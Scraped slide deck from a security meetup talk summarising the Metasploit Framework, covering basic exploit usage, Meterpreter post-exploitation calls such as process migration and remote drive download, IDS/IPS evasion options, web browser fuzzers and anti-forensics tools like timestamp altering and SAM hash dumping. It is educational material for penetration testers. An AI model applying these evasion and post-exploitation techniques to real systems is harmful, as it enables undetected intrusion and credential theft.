This action might not be possible to undo. Are you sure you want to continue?
A CanSecWest Presentation
Original Presenter: HD Moore
Presentation and Additional Information: Tyler Reguly
Who is this guy?
Who am I?
Graduate of Fanshawe College ± Computer Systems Technology 3-year diploma Previously worked at Fanshawe College in student support and as a Sys Admin for a small marketing company Worked doing quasi-International web development for the past 5 years. Now at nCircle as a Vulnerability and Exposure Research Engineer Also a moderator on AntiOnline.com Maintain the ComputerDefense.org blog.
© Toronto Area Security Klatch 2005
Why are we here?
The goal tonight?
Cover information introduced by H.D. Moore at CanSecWest. We¶ll provide you with background information on the Metasploit project and Metasploit Framework. Basic Framework usage Functional differences between Framework versions Various Metasploit Project Web Fuzzers Brief overview of other sections of the Metasploit Project
© Toronto Area Security Klatch 2005
IDS Signature Development and exploit research. MAFIA.Meta-what? What is Metasploit? Metasploit itself is nothing« it¶s not even a word« but it¶s come to mean so much more. etc. Metasploit has come to be synonymous with the Metasploit Framework.to . Hamachi.TASK. Metasploit is actually The Metasploit Project. The Metasploit Framework is one aspect of the Metasploit Project. © Toronto Area Security Klatch 2005 www. Whose goal is to provide information that will be useful in Pentration Testing. Other parts of the project include: MSRT.
sections that are written in C. © Toronto Area Security Klatch 2005 www. python and assembly. testing and using exploit code.to . (Point µn Click Hacking) The current ³stable´ version is version 2.5 Primarily written in perl.TASK. Similar to the commercial projects Canvas (Immunity) and Impact (Core) Rather than be current.Metasploit Framework The framework is an open-source platform for developing. aims to facilitate research and experimentation.
to . reverse shell) Exploit ± run the exploit. © Toronto Area Security Klatch 2005 www. payloads. etc) Use ± Use a specific exploit module Set ± set specific variables (Case sensitive) RHOST ± Remote Host (who we¶re attacking) PAYLOAD ± The payload to carry LHOST ± Local Host (for the phone home attacks.Basic Framework Usage Let¶s take a look at a video demo of Metasploit Framework 2.TASK.5 in action Show ± list modules available (exploits.
DCERPC. restore and share your sessions« Run multi-victim exploits Exploit Mixins Write advanced exploits in 3 lines Mixins for SMB. TCP.0 Alpha R3 Complete rewrite of V2 code« Perl migrated to Ruby Allows for a focus on flexibility and automation Multitasking through Ruby threads Many users can share a single instance of Metasploit Concurrent exploits and sessions Suspend. UDP.0 ± Currently @ 3. New version of Metasploit Framework Framework Version 3.TASK. HTTP. FTP.to . etc © Toronto Area Security Klatch 2005 www.Finally« Something Interesting. TCPServer.
to . New Opcode DB Online database of Win32 DLL Info Stores locations of usable µopcodes¶ Framework Integration CLI tool to perform queries µopcode pool¶ system currently in the works And automated return address updates Add fingerprinting and imagine! © Toronto Area Security Klatch 2005 www.New features« cont¶d New Interfaces Updated module hierarchy (much more organized) See details in video New web interface uses ERB and AJAX Developing a GUI version.TASK.
to .The parts that make the whole! Executable processing Msfpescan Command-line tool for EXE processing Discovers usable return addresses Partially used to created the opcode DB Will also now handle Resources and TLBs (Translation Lookup Buffers) Msfrpcscan Extracts MIDL (MS Interface Definition Language) information from PE files Creates boilerplate for new exploits Still in Development« © Toronto Area Security Klatch 2005 www.TASK.
TASK.Huh? What did he just say? © Toronto Area Security Klatch 2005 www.to .
© Toronto Area Security Klatch 2005 www.to .TASK.
use of Mixins Exploit Module Structure Single exploit can target many platforms Simplified the meta-information fields Mixins can also modify exploit before Target brute forcing Passive Exploits © Toronto Area Security Klatch 2005 www.to . but what else? Rewrite of all Exploit modules Massive number of bug fixes Improved randomness.TASK.Sounds good.
TASK.migrate(pid) Mirror the remote hard drive in one line ± Client.sys.core.dir.fs. ³php´ payloads Meterpreter Consolidation of standard modules ³Wicked Cool´ API and remote scripting Process migration ± Pid = client.Can I do anything cool? Payload upgrades and Enhancements Bug fixes and size improvements New ³cmd´ modules.process[µcalc.exe¶] ± Client.to © Toronto Area Security Klatch 2005 .true) www.´C:\\´.download(³/tmp/´.
Meterpreter Commands © Toronto Area Security Klatch 2005 www.to .TASK.
Meterpreter Commands Cont¶d © Toronto Area Security Klatch 2005 www.TASK.to .
to .TASK.There¶s more?!?! The Problem« Not all exploits fit into the standard structure Recon Modules overlapped with exploits No standard for information sharing Auxiliary Modules Catch-all for interesting security tools Perform reconnaissance and reporting Integrate with third-party utilities Report data in a standard format © Toronto Area Security Klatch 2005 www.
So why Ruby? ³The Ruby Language Rocks´ Ability to redefine anything at runtime Plugins can alter almost anything Framework Plugins Extend and replace Framework Code Hook events and filter parameters Simplify feature development Examples: Socket tracing and filtering Multiuser exploit console © Toronto Area Security Klatch 2005 www.TASK.to .
MySQL.TASK.rb Interact with the database (search.Backend Support for common databases Postgres. SQLite. etc) Persistent storage of session data Reporting is just another plugin © Toronto Area Security Klatch 2005 www.to . etc Based on Ruby on Rails (ROR) Active Record Simplified API and thread-safety Implementation defined by plugins Monitor sockets with db_tracker.
to .TASK.Automation Turning Metasploit into Nessus Database backend provides ³KB´ function Auxiliary modules for assessment/discovery Event coordinator for triggering modules Report generator uses the database Development Status 75% of the database schema 50% of the Aux module API Handful of discovery modules Integration with Nessus/Nmap © Toronto Area Security Klatch 2005 www.
TASK.Automation Cont¶d Creating a professional mass-rooter Aux modules perform discovery Exploit modules perform vuln checks Plugins automate exploitation Plugins automate post exploitation Dump XML reports via ActiveRecord Useful framework for all security tools Extensive protocol support.to . friendly API Passive tools work well with event system Most APIs are accessible from REX © Toronto Area Security Klatch 2005 www.
TASK.How to µnot get caught¶! Evasion is finally taken seriously Evasion options now a separate class Protocol stacks integrate IDS evasion Mixins expose these to exploit modules Strong evasion techniques Multi-layered evasion defeats most solutions Client-side attacks impossible to detect WMF = HTTP + Compress + Chunked +Jscript Deep protocols offer so man options LSASS = TCP + SMB + DCERPC © Toronto Area Security Klatch 2005 www.to .
to .Evasion Options Example Evasion Options TCP::max_send_size TCP::send_delay HTTP::chunked HTTP::compression SMB::pipe_evasion DCERPC::bind_multi DCERPC::alter_context © Toronto Area Security Klatch 2005 www.TASK.
Evasion Features IPS Fingerprinting Implemented as Auxiliary modules Use low-risk signature deltas to ID Linux-based IPS depends on bridging« IPS Evasion Configure an µevasion profile¶ Override exploit/evasion options Uses per-IPS evasion techniques © Toronto Area Security Klatch 2005 www.to .TASK.
to .TASK.Offensive IPS IPS Filtering for the Attacker Socket hooking plugins can filter data Not all vendors encrypt their signatures Lets create an application layer IPS The ³ips_filter´ plugin Monitor all socket transactions Block packets that would trigger an alert Challenges Signatures are often for decoded data Formats are difficult to convert to RE © Toronto Area Security Klatch 2005 www.
plugins. aux modules IPS Detection features depending on time Was scheduled for release April 12th.TASK.0-alpha-r3 User Interfaces are still a bit rough Module cache a huge improvement Over half of the exploits are ported Only supports Linux / OS X / BSD Should work with Cygwin« but not Native yet Metasploit Framework v3. © Toronto Area Security Klatch 2005 www.0-alpha-r4 Includes database.Status Metasploit Framework v3. as been pushed back.to .
TASK.2) (15+ Vulns/Flaws) Why are we suddenly discovering all of these? © Toronto Area Security Klatch 2005 www.0.Web Fuzzing ³Newer´ area in security that¶s actively gaining speed and evolving.5. Broad Range of interest Has lead to numerous exploits released for and upgrades to a number of mainstream browsers Internet Explorer (April 2006): 1 Patch (10 Vulns/Flaws) Firefox (April 2006): 1 Release Version (1.to .
html Dom-Hanoi http://metasploit.com/users/hdm/tools/see-ess-ess-die/cssdie.html CSS Die http://metasploit.D.com/users/hdm/tools/hamachi/hamachi.H.TASK.com/users/hdm/tools/domhanoi/domhanoi.to . Moore¶s Web Fuzzers HD has released a series of web fuzzers Hamachi http://metasploit.html © Toronto Area Security Klatch 2005 www.
1 has passed all built-in Hamachi tests © Toronto Area Security Klatch 2005 www.TASK.to .0.Hamachi Hamachi Created by H D Moore and Aviv Raff Looks for common DHTML implementation flaws How does it work? Specifies common ³bad´ values for method arguments and property values. Has anyone passed? So far Firefox 1.5.
Hamachi Screeshot © Toronto Area Security Klatch 2005 www.TASK.to .
5.to .CSS Die CSS Die Created by H D Moore.0. CSS2 and CSS3. How does it work? Specifies common ³bad´ values for style values. Has anyone passed? So far Firefox 1.TASK. Matt Murphy and Thierry Zoller Looks for common implementation flaws in CSS1.1 has passed all built-in CSS Die tests © Toronto Area Security Klatch 2005 www. Aviv Raff.
TASK.CSS Die Screenshot © Toronto Area Security Klatch 2005 www.to .
How does it work? It adds and removes DOM elements.TASK.to . © Toronto Area Security Klatch 2005 www.DOM-Hanoi DOM-Hanoi Created by H D Moore and Aviv Raff Looks for common DHTML implementation flaws. similar to the way used in the game Tower of Hanoi. Has anyone passed? So far there have been no browsers announced has having passed this series of tests.
DOM-Hanoi Screenshot © Toronto Area Security Klatch 2005 www.to .TASK.
TASK.Latest IE Fully Patched © Toronto Area Security Klatch 2005 www.to .
to . created and entry modified) Slacker ± First ever tool to allow you to hide files in the slack space of an NTFS partition Sam Juicer ± A tool to dump hashes from the SAM without touching the hard disk (Available as a Meterpreter module) Transmogrify ± First ever tool to defeat Encase¶s file signature capabilities by allowing you to mask and unmask files (Coming Soon) © Toronto Area Security Klatch 2005 www.Other Metasploit Projects Metasploit Research Toolkit Standalone disassembler.com Metasploit Anti Forensics tools (MAFIA) Timestomp ± First ever tool to modify all four NTFS timestamp values (modified. mmu eEye-style return detection. emulator.blogspot. input tracing skape has some nice blogs on the subject @ metasploit. accessed.TASK.
Thank You! Thanks! © Toronto Area Security Klatch 2005 www.TASK.to .
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue reading from where you left off, or restart the preview.